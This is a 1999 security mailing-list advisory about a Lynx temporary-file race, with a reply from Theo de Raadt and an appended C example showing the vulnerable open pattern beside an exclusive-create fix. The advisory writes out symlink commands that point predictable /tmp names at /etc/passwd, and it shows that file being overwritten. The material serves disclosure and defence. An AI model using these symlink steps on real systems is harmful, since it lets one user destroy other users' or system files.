
Lynx creates temporary files with predictable names in /tmp, creating a race condition that allows you to overwrite other users' files.





[ http://www.rootshell.com/ ]

Date:         Tue, 9 Feb 1999 20:57:30 -0500
From:         Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
Subject:      Lynx /tmp problem

Hi Aleph,
please filter this if already posted....
------

Hello....

I have found a bug in all versions of Lynx, except the latest stable
release...

Lynx creates temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

If I run lynx as any user, for example root, we see this:

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

Then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

If I make a symlink
from all of these files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file I have linked (in this
case /etc/passwd) will be replaced with it... and is now owned by root...

For example, I got this on my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


As you can see, the file is lost now...

This bug is Lynx-specific, so all OSes are vulnerable..

Fix: upgrade to the latest lynx version. I have checked it, and it appears
to use L[proc num]-xTMP.html where x is from 0 to ???...

I hope it is already fixed; creating 100 symlinks is not too hard :)

The lynx team knows this already.

Bye...


Juan Diego

-----------------------------------------------------------------------------

Date:         Thu, 11 Feb 1999 12:55:41 -0700
From:         Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
Subject:      Re: Lynx /tmp problem

> This bug is Lynx-specific, so all OSes are vulnerable..

OpenBSD ships with an integrated version of lynx.  Our version has
tweaks to avoid this issue.

We've brought this issue up with the lynx people before.  They do not
appear to give a damn.

That said, from reading the code I can see why they might not care --
this problem is going to be a complete nightmare to fix.  Lynx's
handling of /tmp is wrought with many races, and the code is pasta.
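
-----------------------------------------------------------------------------

Added example (not part of either post, and not Lynx or OpenBSD code): the open-and-truncate pattern behind the overwrite described above, beside an exclusive-create fix, run against a constructed stand-in victim file and symlink inside a private scratch directory. The names write_tmp and victim_clobbered and the scratch paths are assumptions made for this example.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* mkdtemp(), symlink(), O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* exclusive=0: create-or-truncate, which is what fopen(path, "w") does; it
   follows a symlink already sitting at a predictable name.
   exclusive=1: O_EXCL fails with EEXIST if anything, a symlink included,
   exists at the name. mkstemp() combines this with an unpredictable name. */
int write_tmp(const char *path, const char *data, int exclusive) {
    int flags = O_WRONLY | O_CREAT | (exclusive ? O_EXCL | O_NOFOLLOW : O_TRUNC);
    int fd = open(path, flags, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Constructed scenario: a stand-in "victim" file and a symlink at the
   L<pid>-<x>TMP.html name, both inside a fresh 0700 scratch directory.
   Returns 1 if the victim was overwritten, 0 if intact, -1 on setup error. */
int victim_clobbered(int exclusive) {
    char dir[] = "/tmp/lynxdemoXXXXXX", victim[64], link[64], buf[16] = "";
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/L%d-%dTMP.html", dir, 3894, 0);
    if (write_tmp(victim, "original", 1) || symlink(victim, link)) return -1;
    write_tmp(link, "<h1>You have reached the History Page</h1>", exclusive);
    FILE *fp = fopen(victim, "r");
    if (!fp || !fgets(buf, sizeof buf, fp)) buf[0] = '\0';
    if (fp) fclose(fp);
    unlink(link); unlink(victim); rmdir(dir);
    return strcmp(buf, "original") != 0;
}

int main(void) {
    printf("create-or-truncate: victim clobbered = %d\n", victim_clobbered(0));
    printf("O_EXCL|O_NOFOLLOW:  victim clobbered = %d\n", victim_clobbered(1));
    return 0;
}
```

The exclusive open still leaves the name predictable, so another user can pre-create it and make the write fail; an unpredictable name from mkstemp() or a per-user 0700 directory removes that as well.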

